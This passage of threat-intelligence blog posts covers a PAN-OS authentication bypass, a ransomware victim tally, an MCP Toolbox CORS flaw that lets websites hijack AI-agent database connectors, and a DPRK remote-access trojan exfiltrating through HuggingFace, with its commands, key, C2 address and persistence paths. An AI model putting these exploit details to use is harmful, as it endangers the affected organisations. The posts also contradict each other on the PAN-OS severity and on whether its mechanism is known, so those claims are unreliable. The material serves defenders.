otherwise compromise the system. The impact extends to potentially bypassing VPN access controls, enabling unauthorized users to connect to internal networks. This capability could be exploited by remote, unauthenticated attackers, making it an effective entry vector into protected network segments. The active exploitation of CVE-2026-0257 in the wild shows that threat actors possess reliable methods to use this vulnerability, making it an immediate operational threat rather than a theoretical risk. Impact An attacker successfully exploiting CVE-2026-0257 can gain unauthorized access to the affected Palo Alto Networks PAN-OS device. This typically means gaining administrative control over the firewall, a privileged position within a network infrastructure. From this vantage point, an adversary can perform various malicious actions, including creating new user accounts, modifying firewall rules to permit arbitrary traffic, disabling security features, establishing persistent access mechanisms (such as VPN connections or SSH keys), exfiltrating sensitive data traversing the network, or deploying further malware onto internal systems. The potential for a complete network compromise through a compromised perimeter device is significant. Organizations at risk include any entity deploying Palo Alto Networks firewalls or other devices running PAN-OS. This encompasses a broad spectrum of industries and sizes, from large enterprises, government agencies, to small and medium-sized businesses that rely on Palo Alto Networks for network security. This vulnerability's real-world impact is global, affecting any organization with internet-exposed PAN-OS instances that remain unpatched or unmitigated. A compromised perimeter firewall fundamentally undermines all downstream security controls. This makes CVE-2026-0257 a serious threat to data confidentiality, integrity, and network availability. Exploitation chain The attack vector for CVE-2026-0257 is an authentication bypass. While the specific technical mechanism (e.g., cryptographic flaw, logic error, or input validation issue) has not been publicly detailed, the outcome is evident: an attacker can bypass the requirement for valid credentials to gain access. This vulnerability type typically targets network-exposed services such as web-based management interfaces, API endpoints, or VPN portals. The primary precondition for exploitation is that a vulnerable PAN-OS instance must be accessible from the network, likely over the internet, allowing unauthenticated remote access attempts. Public Proof-of-Concept (PoC) code has not been disclosed in the provided research. However, the notification states "Active Exploit Detected Today." This confirms that threat actors currently possess and use functional exploits for CVE-2026-0257 in real-world attacks. This means private or targeted exploits are in circulation and are being deployed against vulnerable systems. Active exploitation indicates a high level of sophistication among adversaries using this flaw, and it suggests that technical details, even if not public, are understood within certain threat groups. For more context on the implications of a widely exploited perimeter device, our prior analysis of CVE-2026-0257 also covered the implications for Palo Alto GlobalProtect installations. Affected products and versions CVE-2026-0257 specifically impacts Palo Alto Networks PAN-OS. At the time of this intelligence post, the research findings do not publicly specify the range of affected product versions. This lack of specific version information creates a major challenge for network defenders attempting to determine their exposure. It requires a broad approach to assessment and remediation until more precise vendor guidance becomes available. Organizations utilizing Palo Alto Networks firewall appliances or virtual firewalls running PAN-OS should assume they are potentially affected, regardless of their current version. The absence of version specifics implies that multiple versions or even an entire product line could be susceptible to this critical authentication bypass. Product Line: Palo Alto Networks PAN-OS Affected Versions: Not publicly disclosed in the provided research. All currently deployed PAN-OS instances should be considered potentially vulnerable until specific vendor advisories clarify the scope. The underlying operating system of many Palo Alto Networks appliances is based on a hardened Linux kernel. While CVE-2026-0257 is an application-level authentication bypass, critical flaws can emerge at various layers, including the kernel. We discussed analogous vulnerabilities, such as a critical Linux kernel vulnerability leading to root access, in our analysis of CVE-2026-31431 Linux Root Access. This shows that a complete security posture across all layers of network devices is necessary. Detection Given the absence of specific Indicators of Compromise (IoCs) or detailed attack patterns in publicly available research for CVE-2026-0257, detection strategies must focus on general anomalous activity related to authentication and access on Palo Alto Networks PAN-OS devices. Proactive monitoring and scrutiny of logs are essential to identify potential exploitation attempts or successful compromises. Authentication Log Monitoring: Routinely review PAN-OS authentication logs for unusual login attempts, successful logins from unfamiliar source IP addresses, and accounts accessing administrative interfaces at unusual times. Specifically, look for multiple failed authentication attempts followed by a successful one, or successful logins without any preceding authentication challenge. Administrative Access Auditing: Monitor for any unauthorized changes to firewall configurations, security policies, VPN settings, or user accounts. Changes initiated by unfamiliar accounts or from unexpected locations are suspicious. Network Flow Analysis: Analyze network traffic patterns to and from PAN-OS management interfaces and VPN portals. Look for anomalous data transfers, connections to unusual external IP addresses, or attempts to tunnel unauthorized traffic. System Resource Monitoring: Observe PAN-OS device performance and resource utilization. Sudden spikes in CPU, memory, or network traffic could indicate compromise and malicious activity. Endpoint Detection and Response (EDR) Correlation: If the PAN-OS device is integrated with an EDR solution or has internal network visibility, correlate firewall logs with EDR alerts from internal systems. A successful authentication bypass could lead to further lateral movement within the network. Threat Hunting: Proactively search for signs of compromise, even without specific IoCs. This involves looking for deviations from baseline behavior in network traffic, process execution on the firewall, and configuration settings. Remediation The most effective remediation for CVE-2026-0257 will be the application of official patches released by Palo Alto Networks. Due to active exploitation and the critical nature of an authentication bypass, it is essential that organizations apply these patches as soon as they become available and have been tested in a pre-production environment. Patch Application: Monitor official Palo Alto Networks security advisories and support channels for security updates addressing CVE-2026-0257. Plan for immediate deployment of these patches across all affected PAN-OS instances following vendor guidelines. Access Restriction Workarounds: If patches are not immediately available, implement strict network access restrictions to the PAN-OS administrative interface and any public-facing VPN portals. Limit access to only trusted IP ranges or internal management networks. If possible, consider temporarily disabling external access to management interfaces until a patch can be applied. Multi-Factor Authentication (MFA): Ensure MFA is enforced for all administrative accounts and VPN users. An authentication bypass might circumvent the initial authentication step; however, MFA can provide an additional layer of defense against post-exploitation access attempts if the bypass is incomplete or leads to a different access vector. Network Segmentation: Review and strengthen network segmentation to minimize the blast radius in case of a PAN-OS compromise. Isolate management networks and critical internal systems from less trusted segments. Continuous Monitoring and Auditing: Implement continuous monitoring of PAN-OS devices, focusing on authentication logs, administrative actions, and network traffic for any anomalies. Regularly audit configurations to detect unauthorized changes. Incident Response Preparedness: Ensure incident response plans are updated to include procedures for addressing a compromised network perimeter device. This includes steps for forensic investigation, containment, eradication, and recovery. Technical Takeaways CVE-2026-0257 is a critical authentication bypass vulnerability impacting Palo Alto Networks PAN-OS. The vulnerability is confirmed to be under active exploitation by threat actors, which means immediate risk. Successful exploitation grants unauthorized access to PAN-OS devices, potentially leading to administrative control and network compromise. Specific affected versions and a CVSS score have not been publicly disclosed in the provided research. This requires a broad assessment and proactive defense. Immediate application of vendor-provided patches, coupled with strict access controls and monitoring, is essential for all PAN-OS deployments. --- ## Genesis Group Leads Ransomware Activity with 5 Victims - URL: https://purple-ops.io/blog/genesis-group-ransomware-victims - Date: 2026-05-31 - Category: Ransomware Report - Tags: none - Reading time: 5 min **Summary:** The Genesis Group led recent ransomware activity, claiming 5 new victims across diverse US sectors like construction, retail, and education. Genesis Group Leads Ransomware Activity with 5 Victims Statistical Overview Victim Totals This month: 767 This quarter: 1544 Year to date: 4169 Last 24h: 7 Quarterly Breakdown Q1: 2631 | Q2: 1544 | Q3: 0 | Q4: 0 Ransomware activity totaled 7 new victims in the last 24 hours. The Genesis group accounted for most incidents during this period. Introduction In the last 24 hours, seven new ransomware victims were reported across various sectors and geographies. The Genesis group was the most active, responsible for five incidents, while CMD and Krybit each claimed one victim. Affected sectors include Construction & Engineering, Retail & Ecommerce, Education, Healthcare, Investment Banking, Lubricants, and Residential Remodeling, primarily impacting organizations in the United States. Ransomware Summary Table #GroupVictims (24h)Sample VictimsGeosSectors 1Genesis5A roettgers, Cavalier flooring systems inc., Cedar street capital (a part of a cynvestors limited partnership) (+2)United StatesConstruction & Engineering, Retail & Ecommerce 2CMD1Lake Washington School DistrictUnited StatesEducation 3Krybit1Tulipmediworld.comIndiaHealthcare The Genesis group was responsible for five recent ransomware victims, primarily in the United States, targeting industries such as construction, retail, and investment banking. CMD ransomware affected the Education sector, attacking Lake Washington School District. Krybit claimed one victim in the Healthcare sector in India. Victim Distribution By Country United States: 6 India: 1 By Industry Home Improvement & Hardware Retail: 2 Healthcare: 1 Education: 1 Investment Banking: 1 Lubricants: 1 Residential Remodeling: 1 The United States experienced the most ransomware attacks, accounting for most new victims. Targeting showed a broad approach across various industries, including retail, construction, education, and healthcare, without concentrating on a single vertical. Ransomware News Topline Threat intelligence indicates a rising risk to critical infrastructure, with a shift from cyber espionage to physical disruption. Campaigns & Operations Attackers are increasingly exploiting internet-exposed industrial systems, default passwords, and outdated configurations, with small utilities and local municipalities facing disproportionate risk. Historical instances include destructive wiper attacks, post-breach cleanups, Iranian-affiliated PLC exploitation, and telecom intrusions. The United States experiences a 62% higher cyber-attack frequency compared to the global average. Vulnerabilities & TTPs Exploitation uses weaknesses like default passwords and unpatched systems. Artificial intelligence is integrated into intrusion lifecycles, handling 80-90% of operational tasks in some campaigns, which improves attack automation and efficiency. Analyst Note This trend shows a rising frequency of sophisticated attacks with real-world consequences. It requires strong OT/ICS security measures and coordinated defense strategies. Technical Takeaways The Genesis group accounted for the majority of new ransomware incidents, with five victims in the last 24 hours. Organizations in the United States were overwhelmingly targeted, comprising six out of seven reported victims. Ransomware groups show broad targeting across diverse industries, including construction, retail, education, and healthcare. Critical infrastructure and industrial control systems face escalating threats, with attackers increasingly focused on physical disruption rather than just data exfiltration. Artificial intelligence is used to automate a significant portion of intrusion lifecycles, showing a change in threat actor methods. The continued targeting of organizations in the investment banking sector indicates ongoing financial sector risks. Genesis Group Tactics and Target Profile The Genesis ransomware group has demonstrated a consistent pattern of targeting small-to-mid-sized US businesses across diverse industries. Their recent activity highlights several concerning trends: Sector diversity: Targets span construction, retail, investment banking, and residential services Geographic focus: Predominantly United States-based victims Volume consistency: Five victims in a single 24-hour window indicates an active and organized operation Business size: Targets appear to include both regional firms and larger corporate entities Organizations in these sectors should review their ransomware readiness immediately. See also: Ransomware Group Profiles for detailed threat actor analysis. How Organizations Can Defend Against Genesis Group Attacks Defending against groups like Genesis requires a layered security approach. Security teams should prioritize the following actions: Patch management: Ensure all internet-facing systems are updated to close known vulnerabilities Endpoint detection: Deploy EDR solutions capable of identifying ransomware behavior before encryption begins Backup integrity: Maintain offline, immutable backups tested regularly for restoration Employee training: Phishing remains a primary initial access vector for ransomware operators Incident response planning: Establish documented playbooks for ransomware scenarios Proactive defense reduces dwell time and limits the blast radius of any successful intrusion. Related reading: Ransomware Incident Response Guide. Recent Ransomware Trends Across Active Groups Beyond Genesis, the broader ransomware landscape remains highly active. CMD's targeting of the Lake Washington School District reflects a troubling continuation of attacks on educational institutions, which often lack mature security programs. Krybit's victim in India's healthcare sector underscores that ransomware is a global threat with no industry immune. Education: Frequently targeted due to limited IT budgets and large user bases Healthcare: High-value data and operational urgency make hospitals prime targets Emerging groups: Smaller operators like CMD and Krybit are filling gaps left by disrupted major gangs Monitor the latest ransomware activity feed for real-time updates on emerging group behavior. --- ## MCP Toolbox CVE-2026-9739 (CVSS 9.4) Hijacking Flaw - URL: https://purple-ops.io/blog/cve-2026-9739-mcp-toolbox-hijacking - Date: 2026-05-31 - Category: CVE Analysis - Tags: cve-2026-9739, mcp-toolbox, session-hijacking, cors-bypass, enterprise-database - Reading time: 5 min | CVSS: 9.4 **Summary:** MCP Toolbox CVE-2026-9739 (CVSS 9.4) is a critical flaw enabling session hijacking and data exfiltration from enterprise databases via CORS bypass. MCP Toolbox CVE-2026-9739 (CVSS 9.4) Hijacking Flaw Security researchers have recently identified CVE-2026-9739, a critical vulnerability in the open-source MCP Toolbox affecting enterprise database connectors, with a CVSS base score of 9.4. This flaw enables malicious actors to bypass security controls by exploiting a hardcoded access control wildcard header, overriding critical Cross-Origin Resource Sharing (CORS) policies. As a direct consequence, unauthorized external connections to local servers running the MCP Toolbox become possible. The vulnerability stems from a fundamental development oversight in the tool's Server-Sent Events handler. While developers intended to implement strict origin flags for security, an inadvertently retained permissive header bypasses these controls. This architectural flaw permits unauthorized connections to the local server, which risks enterprise data integrity and confidentiality. At the time of this publication, no confirmed active exploitation of CVE-2026-9739 in the wild has been publicly reported. However, its high CVSS score and clear exploitation vector show its criticality. System administrators and development teams are advised to prioritize remediation to mitigate the potential for session hijacking and unauthorized data exfiltration. What is CVE-2026-9739 and why is it critical? CVE-2026-9739 is a critical vulnerability impacting MCP Toolbox, an open-source software component designed to connect artificial intelligence agents and applications directly to corporate data storage systems. The vulnerability, assigned a CVSS base score of 9.4, allows attackers to circumvent established security policies, specifically Cross-Origin Resource Sharing (CORS) protections. Its criticality arises from the direct pathway it creates for malicious external entities to interact with internal enterprise resources, leading to severe compromises like session hijacking and unauthorized data access. The core of CVE-2026-9739 lies in a misconfiguration within the MCP Toolbox's Server-Sent Events handler. Despite intentions to enforce strict origin policies, a hardcoded access control wildcard header (Access-Control-Allow-Origin: * or similar permissive declaration) was left within the initialization source code. This wildcard effectively overrides any global CORS middleware, enabling any external domain to make requests to the local server where the MCP Toolbox is deployed. The ability to bypass fundamental web security mechanisms makes this flaw highly significant, especially for systems connected to sensitive enterprise databases. Impact The successful exploitation of CVE-2026-9739 carries serious consequences for enterprise networks. An attacker can achieve session hijacking, allowing them to impersonate legitimate users and execute actions within the context of their established sessions. This capability means that any actions or privileges available to the compromised user become accessible to the attacker. The vulnerability allows attackers to use the hijacked MCP Toolbox instance as an open proxy for malicious activities. Enterprises relying on MCP Toolbox to bridge AI applications with critical data infrastructure are particularly at risk. The direct consequence of this vulnerability is the potential for silent data exfiltration from linked databases. Malicious websites can use the hijacked toolbox to run arbitrary commands or queries on behalf of a legitimate user, facilitating unauthorized access and extraction of sensitive information. This risk extends to popular database systems, including Postgres and BigQuery. The compromise of such databases can lead to significant data breaches, regulatory penalties, and reputational damage. The integration of MCP Toolbox within enterprise environments, often connecting to core business data, means that this vulnerability presents a direct path to an organization's most valuable assets. Exploitation Chain The exploitation of CVE-2026-9739 follows a specific sequence, using a fundamental design flaw in the MCP Toolbox's architecture. The attack vector is initiated via a network connection, typically from a malicious website. Vulnerable Component Identification: The prerequisite for exploitation is an MCP Toolbox deployment that utilizes the older v2024-11-05 protocol specification. This version range or protocol adherence indicates the presence of the vulnerable code. Hardcoded Header Presence: The core of the vulnerability resides in the MCP Toolbox's Server-Sent Events handler. Despite intentions to enforce strict origin policies for security, a hardcoded access control wildcard header (Access-Control-Allow-Origin: ) remains embedded within the initialization source code. This header acts as an explicit instruction to browsers to permit cross-origin requests from any* domain. CORS Policy Override: The presence of this permissive hardcoded header completely overrides any global Cross-Origin Resource Sharing (CORS) policies that might be configured at a higher level (e.g., via middleware or server configurations). Instead of adhering to strict origin checks, the system unexpectedly permits unauthorized external connections to the local server where the MCP Toolbox is running. Malicious Website Interaction: An attacker can host a malicious website that contains JavaScript code designed to interact with the vulnerable MCP Toolbox instance. Because of the overridden CORS policy, this malicious website can successfully make requests to the victim's local MCP Toolbox server. Session Hijacking and Tool Execution: Through these unauthorized cross-origin requests, the malicious site can execute arbitrary tools or commands on behalf of the real user whose browser is interacting with the malicious website. This leads directly to session hijacking, where the attacker gains control over the user's session with the MCP Toolbox. Data Exfiltration: Once a session is hijacked, the attacker can use the compromised toolbox as an open proxy to interact with linked enterprise databases like Postgres and BigQuery. This allows for silent data exfiltration, unauthorized data modification, or various other malicious operations, all executed under the guise of the legitimate user's identity and permissions. The absence of public Proof of Concept (PoC) code for CVE-2026-9739 at this time does not diminish its potential impact. However, the underlying mechanism is defined, providing a roadmap for potential exploit development. While this analysis focuses on CVE-2026-9739, organizations should also remain aware of other critical, actively exploited vulnerabilities, such as CVE-2026-0257, a Palo Alto Networks PAN-OS authentication bypass flaw. Our prior analysis of this critical authentication bypass vulnerability, along with further insights into the Palo Alto Networks CVE-2026-0257 exploit, provides context on broader threats. Affected Products and Versions The CVE-2026-9739 vulnerability primarily affects deployments of the MCP Toolbox that utilize a specific, older protocol specification. Organizations should verify their current implementations against this information. Product: MCP Toolbox (open-source enterprise database connectors) Affected Protocol Specification: v2024-11-05 protocol specification This indicates that any deployments configured to adhere to or built upon this specific protocol version are vulnerable. It implies that newer protocol specifications or versions of the MCP Toolbox have either rectified the issue or are not susceptible due to architectural changes. Affected Databases: While the vulnerability is in MCP Toolbox, its impact extends to any enterprise database systems connected via the affected toolbox, specifically mentioning Postgres and BigQuery. Administrators must understand that the vulnerability's presence is tied to the underlying protocol specification being used by their MCP Toolbox instance, rather than a single explicit software version number. This requires a review of the configuration and operational parameters of deployed MCP Toolbox instances to confirm exposure. Detection Detecting exploitation attempts or the presence of CVE-2026-9739 requires a multi-layered approach focusing on network anomalies, log analysis, and endpoint behavior. Given the nature of a CORS bypass leading to session hijacking and potential data exfiltration, monitoring for unusual activity is paramount. Network Indicators: Unusual Cross-Origin Requests: Monitor network traffic for unexpected or unauthorized cross-origin requests originating from internal systems running MCP Toolbox to external, unknown, or suspicious domains. While the vulnerability allows requests to the local server, subsequent attacker actions (e.g., proxying to C2) might involve outbound connections. HTTP Traffic Analysis: Analyze HTTP headers for Origin and Access-Control-Allow-Origin. While the vulnerability itself is about the server sending a permissive header, monitoring suspicious client-side Origin headers alongside responses that contain Access-Control-Allow-Origin: * could indicate an attempt to use the flaw. Anomalous Proxy Activity: Since an exploited toolbox can act as an open proxy, monitor for unusual proxy-like traffic patterns originating from the server hosting MCP Toolbox. This might include connections to unusual ports, protocols, or destinations that are not part of normal operational procedures. Log Signatures: Server Access Logs: Review web server or application logs for the MCP Toolbox for requests originating from unexpected or untrusted IP addresses, especially those that result in successful authentication or data access without prior legitimate interaction. Database Query Logs: Monitor logs of connected databases (e.g., Postgres, BigQuery) for unusual query patterns, high volumes of data access, or queries issued from unexpected user accounts or applications. Pay attention to queries that appear automated or out of character for typical user behavior. CORS-related Warnings/Errors: While the vulnerability bypasses CORS, some underlying systems might still log attempts or warnings related to CORS policies if they are present at other layers, even if ultimately overridden. Endpoint Detection and Response (EDR) Queries: Suspicious Process Execution: Look for unusual child processes being spawned by the MCP Toolbox application or its associated services. This could indicate the execution of arbitrary tools by an attacker. File System Modifications: Monitor for unauthorized file modifications or creations, especially in critical configuration directories or locations where the MCP Toolbox stores sensitive data or scripts. Network Connections by Non-Browser Processes: Query EDR logs for outbound network connections initiated by the MCP Toolbox process to external IPs or domains that are not part of its normal operation, potentially indicating C2 communication or data exfiltration. Implementing strong logging and active monitoring for these indicators can help identify exploitation attempts early, allowing for timely incident response. Remediation Remediating CVE-2026-9739 requires a direct modification to the MCP Toolbox's configuration or source code to remove the permissive access control header. This is a critical step to restore proper Cross-Origin Resource Sharing (CORS) enforcement. Patching: Remove Hardcoded Header: The primary remediation is to remove the hardcoded access control wildcard header from the internal server file of the MCP Toolbox. This header is specifically located within the Server-Sent Events handler's initialization source code. By removing this line (e.g., Access-Control-Allow-Origin: *), the system will revert to its intended behavior, allowing global middleware or other configured security policies to manage origin permissions safely and correctly. Upgrade to a Secure Protocol Specification: If available, upgrade the MCP Toolbox to a version that utilizes a newer protocol specification known to be unaffected by this flaw. The vulnerability specifically targets deployments using the v2024-11-05 protocol specification, suggesting that later versions or protocols might have addressed the issue. Consult the official MCP Toolbox documentation or project repository for information on updated versions or patches. Workarounds and Mitigations: Network Segmentation: Isolate systems running MCP Toolbox into a separate network segment with strict ingress and egress filtering. This can limit the ability of malicious external websites to directly reach the toolbox and restrict any potential outbound data exfiltration or command-and-control communication. Web Application Firewall (WAF): Deploy a WAF in front of the MCP Toolbox instance. Configure the WAF to enforce strict CORS policies, blocking any cross-origin requests that do not originate from explicitly approved domains. While the hardcoded header might bypass some client-side CORS enforcement, a strong WAF can provide an additional layer of protection at the network edge. Principle of Least Privilege: Ensure that the service account or user under which the MCP Toolbox operates has only the absolute minimum necessary permissions to perform its functions. This can limit the impact of a successful session hijacking, reducing an attacker's ability to exfiltrate data or execute arbitrary commands. Input Validation and Output Encoding: While not directly addressing the CORS bypass, implementing stringent input validation for any data processed by MCP Toolbox and proper output encoding for any data displayed can mitigate the risk of secondary injection attacks if an attacker gains partial control. Monitoring: Continuous Security Monitoring: Implement continuous monitoring of network traffic, system logs, and database activity for the indicators described in the Detection section. Rapid detection of anomalous behavior is crucial for minimizing the window of compromise. Regular Security Audits: Conduct regular security audits of MCP Toolbox configurations and connected database permissions to ensure adherence to security best practices and to identify any lingering vulnerabilities or misconfigurations. Prioritizing these remediation steps is essential for protecting enterprise databases and AI applications from the risks posed by CVE-2026-9739. Technical Takeaways CVE-2026-9739 is a critical vulnerability (CVSS 9.4) in MCP Toolbox, an open-source enterprise database connector, allowing session hijacking and data exfiltration. The flaw originates from a hardcoded Access-Control-Allow-Origin: * header in the Server-Sent Events handler, which bypasses global Cross-Origin Resource Sharing (CORS) policies. Exploitation involves a malicious website initiating unauthorized external connections to the local server running the vulnerable MCP Toolbox (specifically those using the v2024-11-05 protocol specification). Successful exploitation can lead to execution of arbitrary tools, use of the toolbox as an open proxy, and silent data exfiltration from linked databases like Postgres and BigQuery. Remediation requires removing the hardcoded permissive header from the internal server file and upgrading to a secure protocol specification if available, complemented by network segmentation and strong monitoring. --- ## FAMOUS CHOLLIMA RAT Abuses HuggingFace for Exfil - URL: https://purple-ops.io/blog/famous-chollima-huggingface-rat - Date: 2026-05-31 - Category: Threat Intelligence - Tags: famous-chollima, huggingface, rat, dprk, cryptocurrency-theft - Reading time: 5 min **Summary:** DPRK-backed FAMOUS CHOLLIMA's MicrosoftSystem64 RAT actively exfiltrates 1,097 credentials and 417 screenshots from crypto traders using HuggingFace for... FAMOUS CHOLLIMA RAT Abuses HuggingFace for Exfil A sophisticated multi-platform Remote Access Trojan (RAT), dubbed MicrosoftSystem64, linked to the DPRK-backed threat actor FAMOUS CHOLLIMA, is actively exploiting the open-source supply chain to target cryptocurrency traders and exfiltrate sensitive data. This advanced malware, distributed through a series of malicious npm packages, notably js-logger-pack, utilizes HuggingFace as a novel command-and-control (C2) and data exfiltration backend, making detection challenging for conventional security measures. As of a live infrastructure probe on May 28, 2026, researchers confirmed the active surveillance of multiple victims, observing the theft of 1,097 credential files and 417 screenshots from compromised systems. The MicrosoftSystem64 RAT demonstrates a comprehensive array of capabilities, including persistent cross-platform keylogging, extensive cryptocurrency wallet and browser credential theft, Telegram session hijacking, and SSH key exfiltration. Its operational resilience is marked by rapid account rotation and infrastructure pivoting, circumventing previous takedowns. The use of a legitimate machine learning platform like HuggingFace for authenticated data uploads provides FAMOUS CHOLLIMA with a stealthy exfiltration channel, where stolen data is organized into private datasets, further obscuring the malicious traffic within expected network patterns. This campaign underscores the persistent and evolving threat from state-sponsored actors targeting developers and high-value individuals within specialized sectors like cryptocurrency trading. Organizations engaged in software development, particularly those relying on public package registries, face an immediate need to enhance their supply chain security posture against such advanced and adaptive threats. How Does the MicrosoftSystem64 RAT Operate and Exfiltrate Data? The MicrosoftSystem64 RAT, identified as an 81 MB stripped ELF binary (with Windows and macOS variants), functions as a Node.js Single Executable Application (SEA) built on Node.js v20.18.2. This packaging method allows the malware to run without requiring Node.js to be pre-installed on victim machines, while also making static analysis more difficult due to the embedded V8 runtime strings. The binary sets its process.title to MicrosoftSystem64, masquerading as a legitimate Microsoft service. The malware's configuration, bundled from dist/config.js, includes hardcoded values obfuscated with a simple XOR cipher and an easily deciphered key: [90, 60, 126, 18, 159, 75, 109, 138]. This configuration reveals its C2 WebSocket endpoint at ws://195[.]201[.]194[.]107:8010 and details for the HuggingFace model repository jpeek998/system-releases, used for binary updates and exfiltration. The threat actor's operational security lapse is evident, as plaintext comments within the configuration disclose the actual values, simplifying deobfuscation. Command and Control Protocol The MicrosoftSystem64 agent establishes a WebSocket connection to its C2 server, implementing automatic reconnection with exponential backoff. Upon connection, it sends a heartbeat message containing a unique agentId derived from the victim's platform, username, and machine identifier, facilitating operator tracking. The heartbeat interval is configured at 15 seconds, ensuring regular communication and resilience against network interruptions. The binary is designed to accept 24 distinct task types from the C2 operator, effectively acting as a full-featured remote access trojan. This extensive command set allows for deep reconnaissance, data theft, and system manipulation. Task TypeCapability scan_walletsEnumerate and exfiltrate all cryptocurrency wallet browser extensions and standalone wallet applications. scan_filesScan the filesystem for files matching attacker-specified patterns. send_tdataCompress and upload Telegram Desktop session data. download_sshExfiltrate SSH keys directory, including id_rsa, id_ed25519, id_ecdsa, known_hosts, and authorized_keys. exec_commandExecute arbitrary shell commands using PowerShell on Windows or /bin/sh on Unix-like systems, supporting configurable timeouts and working directories. list_dirPerform directory listings on the compromised system. list_drivesEnumerate mounted drives and volumes. get_system_infoCollect detailed OS, CPU, RAM, network, and user information. get_folder_sizeGather reconnaissance on file and folder sizes. start_input_captureInitiate a cross-platform keylogger with clipboard capture, polling every 1 second. start_screenshot_hf_uploadEnable periodic screenshot uploads to HuggingFace every 60 seconds. clipboard_getRetrieve the current contents of the system clipboard. upload_folder_hfUpload arbitrary directories to HuggingFace datasets. Novel Data Exfiltration via HuggingFace A distinguishing characteristic of MicrosoftSystem64 is its abuse of HuggingFace for data exfiltration, a technique previously documented by JFrog Research. Instead of routing stolen data through its C2 server, the RAT creates private datasets under the attacker's HuggingFace account, committing stolen files using the platform's Git LFS API. This strategy offloads storage to HuggingFace's infrastructure, making exfiltration harder to detect since traffic appears as legitimate HTTPS requests to a trusted machine learning platform. After each upload, the agent notifies the C2 server with metadata about the uploaded content, directing the operator to the specific HuggingFace dataset. The current operation leverages the HuggingFace account jpeek998, an apparent pivot from an earlier account, Lordplay. Comprehensive Credential and Session Theft The malware executes a systematic _scanBrowserProfiles function, targeting credentials from 15 browser families across Windows, macOS, and Linux by searching %LOCALAPPDATA%, %APPDATA%, ~/Library/Application Support, and ~/.config paths. Before accessing credential databases, browser processes like Chrome, Brave, Firefox, Edge, Opera, and Vivaldi are forcibly terminated to release file locks. Over 80 cryptocurrency wallet browser extensions are specifically targeted, with the malware configured to steal both extension code directories and their localStorage data. Each stolen extension's data is copied, subject to a 100 MB per-file size cap, and compressed into a gzip archive for upload. This includes extensions for major chains like Ethereum, Solana, Bitcoin, and multi-chain wallets. For Telegram users, the handleSendTdata function targets the Telegram Desktop tdata directory, which contains session keys enabling full account takeover. The tdata directory is gzipped and uploaded to HuggingFace, accompanied by the victim's OS, IP address, and username as metadata. Additionally, the download_ssh task specifically exfiltrates the entire ~/.ssh directory, packaging and uploading crucial files like id_rsa, id_ed25519, id_ecdsa, known_hosts, and authorized_keys to a dedicated HuggingFace dataset. Persistent Surveillance and Self-Update The MicrosoftSystem64 RAT integrates a cross-platform keylogger using native OS-level input capture APIs. On Windows, it leverages SetWindowsHookEx; on macOS, it employs Core Graphics CGEventTap; and on Linux, it attempts xinput test-xi2 before falling back to raw /dev/input evdev reading. This keylogger operates in conjunction with a clipboard watcher that polls every second, capturing sensitive textual data. Furthermore, the malware supports both on-demand and periodic screenshot capture across all platforms, uploading images to HuggingFace every 60 seconds when enabled. Persistence is established across Windows, macOS, and Linux using various techniques. On Windows, it creates a scheduled task \MicrosoftSystem64 and a Run registry key; on macOS, a LaunchAgent plist ~/Library/LaunchAgents/com.launchkeeper.MicrosoftSystem64.plist; and on Linux, a systemd user service ~/.config/systemd/user/MicrosoftSystem64.service and an XDG autostart desktop entry. The malware also includes a self-update mechanism, checking the HuggingFace repository every 24 hours for newer versions and replacing its own executable if an update is available. This enables the threat actor to maintain control and evolve the malware's capabilities without direct re-infection. Attacker Infrastructure and Active Victim Data A live probe of the attacker's HuggingFace infrastructure on May 28, 2026, confirmed the active operation of the exfiltration pipeline with real victims. The FAMOUS CHOLLIMA group operates two HuggingFace accounts: Lordplay (created 2025-11-24), previously used for binary hosting and now disabled by HuggingFace, and jpeek998 (created 2026-05-15), which is currently fully active for data exfiltration. Using the embedded token, three private datasets were enumerated under jpeek998, containing data from two active victims: DatasetVictimTypeFilesTime Range (UTC)Size jpeek998/linux_ubuntu_f083ccb52684Linux (Ubuntu)Screenshots (base64 PNG)323May 27 23:51 to May 28 05:14~167 MB jpeek998/win_wulin_e8bc41d9aca8Windows (wulin)Screenshots (base64 PNG)94May 28 03:41 to May 28 05:14~16 MB jpeek998/win_wulin_e8bc41d9aca8_scan_filesWindows (wulin)Stolen credential files (gzip)1May 28 03:43500 MB Analysis of the wulin victim's 500 MB credential archive revealed 1,097 credential files, including SSH keys, Chrome and Edge login data, Claude Desktop app data, NVIDIA app credentials, WeChat session data, HuaYoungBrowser data, and Remote Desktop connection files. The Linux victim's desktop screenshots displayed a crypto trading terminal and Python scripts, while the Windows victim's showed ChatGPT, a JoinQuant algorithmic trading platform, and VS Code browsing cryptocurrency exchanges. Both profiles indicate cryptocurrency traders as targets, aligning with the RAT's specialized capabilities. More details on the broader campaign lineage and FAMOUS CHOLLIMA's tactics can be found in our APT Groups Tracking research. What Vulnerabilities are Threat Actors Exploiting in Palo Alto GlobalProtect VPNs? Palo Alto Networks is currently addressing a High-severity authentication bypass vulnerability, CVE-2026-0257, within its PAN-OS GlobalProtect VPN software, which is actively being exploited in the wild. This flaw enables attackers to establish unauthorized VPN connections, potentially breaching corporate networks. The CVE-2026-0257 vulnerability was initially rated Medium due to specific configuration prerequisites, namely requiring devices to have authentication override cookies enabled and a particular certificate setup. However, the severity rating was elevated to High after Palo Alto Networks confirmed active exploitation attempts against unpatched devices lacking mitigations. Security firm Rapid7 reported observing successful exploitation against numerous customers starting as early as May 17, 2026. These attacks involve threat actors authenticating to GlobalProtect gateways by forging authentication override cookies that target local administrator accounts. The initial waves of attacks were traced back to infrastructure hosted by Vultr on May 18, followed by a second wave from Dromatics Systems on May 21. The underlying mechanism of CVE-2026-0257 stems from PAN-OS's insufficient validation of authentication override cookies. When the same certificate is used for both HTTPS services and authentication override cookies, attackers can obtain the public key via the HTTPS session. This allows them to forge valid authentication cookies that the device accepts as legitimate without proper signature verification. The Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2026-0257 to its Known Exploited Vulnerabilities catalog, mandating federal agencies to mitigate the flaw by June 1, 2026. Organizations using affected GlobalProtect VPN devices are urged to install the latest security updates immediately or disable the authentication override feature, or utilize a distinct certificate for this feature. More information on addressing such vulnerabilities can be found in our Vulnerability Management Strategies guide. How Are State-Sponsored Groups Escalating Cyber Attacks on Critical Infrastructure? Cyber attacks against critical infrastructure sectors are increasingly shifting from espionage to physical disruption, with state-sponsored groups deploying more aggressive tactics. Recent reports highlight a surge in incidents attributed to Iranian-affiliated cyber actors and China-aligned actors, demonstrating advanced capabilities and intent to cause tangible damage. The Polish ABW warned on May 11, 2026, that cyberattacks are moving towards physical disruption, often exploiting 